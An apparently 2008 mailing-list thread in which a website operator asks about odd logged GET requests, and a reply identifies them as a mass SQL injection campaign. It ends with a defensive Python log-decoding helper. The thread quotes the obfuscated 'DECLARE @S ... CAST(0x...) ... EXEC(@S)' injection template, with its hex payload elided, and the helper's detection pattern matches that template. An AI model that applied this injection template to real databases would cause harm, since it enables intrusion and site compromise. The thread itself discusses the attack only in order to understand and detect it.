Further discussion including a translation of the hex string here:
http://wordpress.org/support/topic/195497
A quick google of a snippet of that query got this
http://web-robot-abuse.blogspot.com/2008/08/latest-hack-running-right-now-is.html
> The latest hack running right now is an injection attempt using a string like
> this.
>
>
>DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C----removed----%20AS%20CHAR(4000));EXEC(@S);
>
> Update hackers.txt file right now.
Not really certain what all that means.
Jack
Adrian Walker wrote:
> Hi All --
>
> Your expert advice please.
>
> On our website [1], we support a kind of Wiki for business rules and
> facts, written in executable English.
>
> The site can also be used as an SOA endpoint.
>
> One of the sets of rules and facts on the site is a version of the
> FeaReferenceModelOntology.
>
> We are seeing incoming GET commands like the one listed below.
>
> [15/Aug/2008:13:10:57 -0400] "GET
>
>/demo_agents/FeaReferenceModelOntology2.agent?;DeCLARE%20@S%20CHAR(4000);SET%20@S=CAST(----removed----%20AS%20CHAR(4000));ExEC(@S);
> HTTP/1.1" 200 620290
>
> The commands originate from many different sites around the internet,
> and we have not been able to find out why they are being sent.
>
> Does anyone know please what these commands are trying to do? Or are
> they simply buffer overflow attack attempts?
>
> Thanks for your kind thoughts about this, and apologies for cross posting.
>
> -- Adrian
>
> [1] Internet Business Logic
> A Wiki and SOA Endpoint for Executable Open Vocabulary English over SQL
> and RDF
> Online at www.reengineeringllc.com <http://www.reengineeringllc.com>
> Shared use is free
>
> Adrian Walker
> Reengineering
>
>
> ------------------------------------------------------------------------
>
>
> _________________________________________________________________
> Message Archives: http://ontolog.cim3.net/forum/ontolog-forum/
> Subscribe/Config: http://ontolog.cim3.net/mailman/listinfo/ontolog-forum/
> Unsubscribe: mailto:ontolog-forum-leave@xxxxxxxxxxxxxxxx
> Shared Files: http://ontolog.cim3.net/file/
> Community Wiki: http://ontolog.cim3.net/wiki/
> To Post: mailto:ontolog-forum@xxxxxxxxxxxxxxxx
>
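
Added example, not part of the original thread: a Python helper a log reviewer could use to see what a request like the one quoted above is trying to run, by URL-decoding the line and hex-decoding the `CAST(0x... AS CHAR(4000))` argument. The sample line, its `/page.asp` path and the function names are constructed for illustration, and the UTF-16 branch for `NVARCHAR` variants is an assumption that goes beyond what the thread shows.

```python
import re
from urllib.parse import unquote

# Obfuscation seen in the logged request: CAST(0x<hex> AS CHAR(n)), later EXEC'd.
CAST_HEX = re.compile(r"CAST\s*\(\s*0x([0-9A-F]+)\s+AS\s+N?(?:VAR)?CHAR", re.IGNORECASE)


def decode_cast_payloads(log_line):
    """Return the SQL text hidden in each CAST(0x.. AS CHAR(..)) of a log line."""
    decoded = []
    text = unquote(log_line)  # %20 -> space, as the application would receive it
    for match in CAST_HEX.finditer(text):
        hex_digits = match.group(1)
        if len(hex_digits) % 2:  # truncated log entry: drop the dangling nibble
            hex_digits = hex_digits[:-1]
        raw = bytes.fromhex(hex_digits)
        # Assumption: NVARCHAR variants carry UTF-16LE (a NUL after each ASCII byte).
        if len(raw) >= 2 and len(raw) % 2 == 0 and raw[1::2].count(0) == len(raw) // 2:
            decoded.append(raw.decode("utf-16-le", errors="replace"))
        else:
            decoded.append(raw.decode("latin-1"))
    return decoded


def is_suspicious(log_line):
    """Flag requests that both build a string from hex and EXEC it."""
    text = unquote(log_line).upper().replace(" ", "")
    return "CAST(0X" in text and "EXEC(" in text


# Constructed sample: harmless SQL encoded the same way, not the logged payload.
_SAMPLE_SQL = "SELECT 'constructed sample'"
SAMPLE_LINE = (
    '[15/Aug/2008:13:10:57 -0400] "GET /page.asp?id=1;DeCLARE%20@S%20CHAR(4000);'
    "SET%20@S=CAST(0x" + _SAMPLE_SQL.encode().hex().upper()
    + '%20AS%20CHAR(4000));ExEC(@S); HTTP/1.1" 200 512'
)

if __name__ == "__main__":
    if is_suspicious(SAMPLE_LINE):
        for sql in decode_cast_payloads(SAMPLE_LINE):
            print("decoded statement:", sql)
```

The decoded text is only printed for review; nothing is sent to a database.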